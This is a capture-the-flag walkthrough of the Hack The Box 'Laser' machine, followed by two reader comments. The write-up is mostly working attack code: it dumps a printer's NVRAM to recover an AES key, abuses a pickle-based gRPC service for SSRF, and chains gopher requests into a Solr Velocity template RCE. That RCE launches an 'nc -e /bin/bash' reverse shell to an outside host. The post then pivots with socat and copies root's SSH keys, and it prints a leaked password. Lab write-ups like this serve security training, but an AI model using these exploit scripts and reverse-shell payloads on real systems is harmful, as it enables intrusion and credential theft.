 
Machine IP : 10.10.10.201
First start with Nmap:
rajsec@kali:~/HTB/laser$ nmap -sC -sV --min-rate=5000 10.10.10.201
Nmap scan report for 10.10.10.201
Host is up (0.12s latency).
Not shown: 959 filtered ports, 40 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It seems only port 22 is open. Let's use PortScanner to look for more open ports:
git clone https://github.com/varshithrajbasa/Port-Scanner.git
rajsec@kali:~/Desktop/Port-Scanner$ ./portscanner.py -i 10.10.10.201
  ____________________
< Port Scanner v.1.1.2 >
  --------------------
         \   ^__^ 
          \  (oo)\_______
             (__)\       )\/\
                 ||----w |
                 ||     ||
--------------------------------------------------
Scanning target 10.10.10.201
Scan Started: 2020-11-05 01:26:41.033400
--------------------------------------------------
Port 22 is open
Port 9000 is open
Port 9100 is open
--------------------------------------------------
Scan Ended: 2020-11-05 01:26:42.612937
--------------------------------------------------
After some research I found that port 9100 is HP JetDirect, a TCP/IP printing service, and found the following enumeration tool:
PRET tool
git clone https://github.com/RUB-NDS/PRET.git
rajsec@kali:~/HTB/laser/PRET$ ./pret.py 10.10.10.201 pjl
Please install the 'colorama' module for color support.
      ________________                                             
    _/_______________/|                                            
   /___________/___//||   PRET | Printer Exploitation Toolkit v0.40
  |===        |----| ||    by Jens Mueller <jens.a.mueller@rub.de> 
  |           |   ô| ||                                            
  |___________|   ô| ||                                            
  | ||/.´---.||    | ||      「 pentesting tool that made          
  |-||/_____\||-.  | |´         dumpster diving obsolete‥ 」       
  |_||=L==H==||_|__|/                                              
                                                                   
     (ASCII art by                                                 
     Jan Foerster)                                                 
                                                                   
Connection to 10.10.10.201 established
Device:   LaserCorp LaserJet 4ML
Welcome to the pret shell. Type help or ? to list commands.
10.10.10.201:/> ls
d        -   pjl
10.10.10.201:/> 
10.10.10.201:/pjl/jobs> nvram dump
Writing copy to 10.10.10.201 ......................................................................................................................................................................................
.................................................................................................................................................................................
.................................................................................................................................................................................
..................................................................k...e....y.....13vu94r6..643rv19u
10.10.10.201:/pjl/jobs>
sed -e "s#'##g" queued | cut -c2- > queued.b64
Now the quotes are stripped and our file contains just the encoded data:
rajsec@kali:~/HTB/laser/PRET$ sed -e "s#'##g" 10.10.10.201 | cut -c2- > queued.b64
rajsec@kali:~/HTB/laser/PRET$ ls
10.10.10.201 codebook.py db discovery.pyc fuzzer.pyc img mibs operators.pyc pcl.pyc postscript.py printer.py README.md capabilities.py codebook.pyc DISCLAIMER.md fonts helper.py LICENSE.md nvram overlays pjl.py postscript.pyc printer.pyc testpages capabilities.pyc console.py discovery.py fuzzer.py helper.pyc lpd operators.py pcl.py pjl.pyc pret.py queued.b64
decode.py file
import base64

# read the stripped base85 text; drop the trailing newline, which is not a valid base85 character
with open("queued.b64", "r") as rajsec:
    rajsec_content = rajsec.read().strip()
    b85dec_content = base64.b85decode(rajsec_content)
    # the decoded bytes are the encrypted print job, decrypted by aesdec.py below
    with open("rajsec.raw", "wb") as rajsec_jpg:
        rajsec_jpg.write(b85dec_content)
The AES decryption script, aesdec.py:
#!/usr/bin/env python3
import io, sys
from Crypto.Cipher import AES  # pycryptodome

# the key recovered from the NVRAM dump; AES.new needs a bytes key in Python 3
key = b'13vu94r6643rv19u'
with io.open('rajsec.raw', 'rb') as fp:
    c = fp.read()[8:]             # skip the 8-byte header
    iv, ct = c[:16], c[16:]       # 16-byte IV followed by the ciphertext
    cipher = AES.new(key, AES.MODE_CBC, iv)
    z = cipher.decrypt(ct)
    sys.stdout.buffer.write(z)    # raw decrypted bytes (the PDF) go to stdout
Let's run it and we will get a pdf file
rajsec@kali:~/HTB/laser/PRET$ python aesdec.py > rajsec.pdf
Some important parts of the PDF are:
...
return service_pb2.Data(feed='Pushing feeds')
...
Here is what a sample feed looks like:
{
    "version": "v1.0",
    "title": "Printer Feed",
    "home_page_url": "http://printer.laserinternal.htb/",
    "feed_url": "http://printer.laserinternal.htb/feeds.json",
    "items": [
        {
            "id": "2",
            "content_text": "Queue jobs"
        },
        {
            "id": "1",
            "content_text": "Failed items"
        }
    ]
}
The service on port 9000 uses a Content message, a Data message and a Print service, so let's create rajsec.proto:
syntax = "proto3";
message Content {
    string data = 1;
}
message Data {
    // the service replies with Data(feed='Pushing feeds'), so feed is a string, not a float
    string feed = 1;
}
service Print {
    rpc Feed(Content) returns (Data) {}
}
Now install the dependencies with pip3 and generate the Python stubs:
pip3 install grpcio
pip3 install grpcio-tools
rajsec@kali:~/HTB/laser$ python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. rajsec.proto
Now we have the generated files and can start creating our client:
rajsec@kali:~/HTB/laser$ ls
rajsec_pb2_grpc.py rajsec_pb2.py rajsec.proto
Let's use the service to probe internal ports with scanner.py:
import sys, pickle, base64
import grpc, rajsec_pb2, rajsec_pb2_grpc

# one channel and stub for the whole scan instead of a new one per port
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = rajsec_pb2_grpc.PrintStub(channel)

for port in range(1, 65536):
    # the service unpickles the data field, so the JSON string is pickled and base64-encoded
    payload = '{"feed_url":"http://localhost:' + str(port) + '"}'
    payload = base64.b64encode(pickle.dumps(payload))
    content = rajsec_pb2.Content(data=payload)
    try:
        response = stub.Feed(content, timeout=10)
        print(port, response)
    except grpc.RpcError as ex:
        # closed ports come back as "Connection refused"; any other error is worth a look
        if 'Connection refused' in ex.details():
            continue
        print(port)
Let's run scanner.py:
rajsec@kali:~/HTB/laser$ python3 scanner.py
22
7983
8983 feed: "Pushing feeds"
9000
9100
Port 8983 answers with "Pushing feeds", so that is where the service fetched the feed from.
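For the defender's side of this service, here is an added example (not code from the box or from the original post) of how a Print.Feed handler could validate the data field before fetching anything: it parses JSON instead of unpickling, and it rejects feed URLs whose scheme is not http(s), whose host is loopback, private or not on an allowlist, or whose port is non-standard, which is what the localhost port-scan payload above depends on. The function names, the allowlisted host printer.laserinternal.htb and the policy itself are assumptions.

```python
import base64
import ipaddress
import json
import pickle
from urllib.parse import urlsplit

# Assumed policy for the hypothetical handler: one known host, http(s) only, default ports only.
ALLOWED_HOSTS = {"printer.laserinternal.htb"}
ALLOWED_SCHEMES = {"http", "https"}

def host_allowed(host: str) -> bool:
    """Literal IPs must be globally routable; names must be on the allowlist."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() in ALLOWED_HOSTS   # "localhost" and internal names land here
    return addr.is_global                       # rejects 127.0.0.1, 172.18.0.1, ::1, ...

def check_feed_request(data: str) -> tuple:
    """Validate the base64 'data' field of a Content message before anything is fetched.

    Returns (True, feed_url) if the request may proceed, else (False, reason).
    The dangerous shape is pickle.loads(base64.b64decode(data)); this parses JSON only.
    """
    try:
        obj = json.loads(base64.b64decode(data, validate=True).decode("utf-8"))
    except ValueError:          # covers binascii.Error, UnicodeDecodeError, JSONDecodeError
        return (False, "payload is not base64-encoded JSON")
    url = obj.get("feed_url") if isinstance(obj, dict) else None
    if not isinstance(url, str):
        return (False, "feed_url missing")
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return (False, "scheme not allowed: " + parts.scheme)      # gopher:// stops here
    if not host_allowed(parts.hostname or ""):
        return (False, "host not allowed: " + (parts.hostname or ""))
    if parts.port not in (None, 80, 443):
        return (False, "port not allowed: %d" % parts.port)       # no 8983, 9000, ...
    return (True, url)

def encode_json_request(obj) -> str:
    """What a legitimate client should send: JSON, then base64, never pickle."""
    return base64.b64encode(json.dumps(obj).encode()).decode()

# Constructed samples: a legitimate request and the request shapes seen in this walkthrough.
SAMPLE_OK = encode_json_request({"feed_url": "http://printer.laserinternal.htb/feeds.json"})
SAMPLE_PICKLED = base64.b64encode(pickle.dumps('{"feed_url":"http://localhost:8983"}')).decode()
SAMPLE_GOPHER = encode_json_request({"feed_url": "gopher://localhost:8983/"})
SAMPLE_LOOPBACK = encode_json_request({"feed_url": "http://127.0.0.1:8983/solr/"})
```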
Now use two scripts to get a shell.
exp1.py
import base64
import pickle
import os
data0 = '{"feed_url":"gopher://localhost:8983/0POST%20%2Fsolr%2Fstaging%2Fconfig%20HTTP%2F1.1%0AHost%3A%20localhost%3A8983%0AContent-Type%3A%20application%2Fjson%0AContent-Length%3A%20259%0A%0A%7B%0A%20%20%22update-queryresponsewriter%22%3A%20%7B%0A%20%20%20%20%22startup%22%3A%20%22lazy%22%2C%0A%20%20%20%20%22name%22%3A%20%22velocity%22%2C%0A%20%20%20%20%22class%22%3A%20%22solr.VelocityResponseWriter%22%2C%0A%20%20%20%20%22template.base.dir%22%3A%20%22%22%2C%0A%20%20%20%20%22solr.resource.loader.enabled%22%3A%20%22true%22%2C%0A%20%20%20%20%22params.resource.loader.enabled%22%3A%20%22true%22%0A%20%20%7D%0A%7D"}'
data = base64.b64encode(pickle.dumps(data0))
os.system("/home/rajsec/HTB/laser/grpcurl -plaintext -d '{\"data\":\"%s\"}' -proto rajsec.proto 10.10.10.201:9000 Print.Feed" % data.decode())
exp2.py
import base64
import pickle
import os
import sys
data1 = '{"feed_url":"http://localhost:8983/solr/staging/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nc%2010.10.10.6%204444%20-e%20%2Fbin%2Fbash%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"}'
data = base64.b64encode(pickle.dumps(data1))
os.system("/home/rajsec/HTB/laser/grpcurl -plaintext -d '{\"data\":\"%s\"}' -proto rajsec.proto 10.10.10.201:9000 Print.Feed" % data.decode())
Now start the listener:
rajsec@kali:~/HTB/laser$ nc -nvlp 5678
listening on [any] 5678 ...
connect to [10.10.**.**] from printer.laserinternal.htb [10.10.10.201] 52148
$ whoami
solr
$ cd /home/solr
/home/solr
$ wc -c user.txt
33 user.txt
After running pspy64 I got the docker password:
c413d115b3d87664499624e7826d8c5a
Get socat into the docker container, stop its ssh service and let socat forward port 22 to 172.18.0.1:
service ssh stop
chmod +x socat
./socat TCP-LISTEN:22,fork,reuseaddr TCP:172.18.0.1:22
Let's create the shell script (printf is used because a plain echo would leave the \n literal and the whole script would end up as one comment line):
printf '#!/bin/sh\nmkdir -p /tmp/rajsec; cp -R /root/.ssh /tmp/rajsec; chown -R solr:solr /tmp/rajsec\n' > /tmp/rajsec.sh
chmod a+x /tmp/rajsec.sh
Now we have the key:
solr@laser:/tmp/rajsec/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
solr@laser:/tmp/rajsec/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
[private key contents omitted]
-----END RSA PRIVATE KEY-----
solr@laser:/tmp/rajsec/.ssh$
Now save it as key, then change its permissions and log in:
rajsec@kali:~/HTB/laser$ chmod 600 key
rajsec@kali:~/HTB/laser$ ssh -i key root@10.10.10.201
load pubkey "key": invalid format
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 04 Nov 2020 03:33:38 PM UTC

  System load:  0.12
  Usage of /:   42.5% of 19.56GB
  Memory usage: 65%
  Swap usage:   0%
  Processes:    235
  Users logged in: 0
  IPv4 address for br-3ae8661b394c: 172.18.0.1
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for ens160: 10.10.10.201
  IPv6 address for ens160: dead:beef::250:56ff:feb9:77c8

73 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: *** *** **--**-*-*-* from 10.10.**.**
root@laser:~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
root@laser:~# hostname
laser
root@laser:~# wc -c root.txt
33 root.txt
root@laser:~#
That's it, we rooted the box.
Thanks for Reading
 
 
2 Comments
Awesome but dump doesn't work so I use "nvram dump" command to get the queued file, but no idea where it is stored..
Can you tell me where the queued file is located??